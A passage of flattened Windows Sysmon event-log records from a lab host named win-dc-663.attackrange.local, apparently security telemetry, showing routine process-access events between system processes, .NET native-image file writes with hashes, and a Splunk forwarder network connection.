21:06:57.640{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 354300x800000000000000022626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.319{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61458-false10.0.1.12-8000- 10341000x800000000000000022625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.561{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-2E05-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022624Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.546{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E3CBB922C309D495B27BE604AC2DDCE,SHA256=8A575F4F77CB56E541C417EFBAD4F1EB4C7F53B72CBA647750C8C8A801422049,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022623Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.530{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-2E05-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022622Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.530{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A271-60D3-2E05-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.530{4DB9351A-A271-60D3-2D05-00000000CF01}7116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\87864XVE90\ComSvcConfig.ni.exe.auxMD5=223EBCDE576BDD160225EA3C3EE9C47E,SHA256=F7B511900ED461BAD0917F9269C59E50CF0D2C4BBA417684CF1BF742D8BB9646,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.530{4DB9351A-A271-60D3-2D05-00000000CF01}7116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\87864XVE90\ComSvcConfig.ni.exeMD5=DD58353AC9774C7A6954EC1E19E970AE,SHA256=24F14788363EA0F19CF859207F05AEC7D60AC8173A8133C637114B46079D46D9,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-2D05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.468{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-2D05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.468{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A271-60D3-2D05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.468{4DB9351A-A271-60D3-2C05-00000000CF01}6472NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0B3SL8OQYF\AuditPolicyGPManagedStubs.Interop.ni.dll.auxMD5=CB8DA466E42AB9DEC2FFE9A237C2152C,SHA256=7BE538E381DACF79692FE14EFA34B5BA9026472E141FC4B3F1CC4BE067F773BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.468{4DB9351A-A271-60D3-2C05-00000000CF01}6472NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0B3SL8OQYF\AuditPolicyGPManagedStubs.Interop.ni.dllMD5=38B06A7F6FDC53399BA3F9640A421FFF,SHA256=5BBC3A4F42BC6EF2074AC3038F02D89B88555DC9A06C304D4A4AF80C1EE96274,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7765124C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.452{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 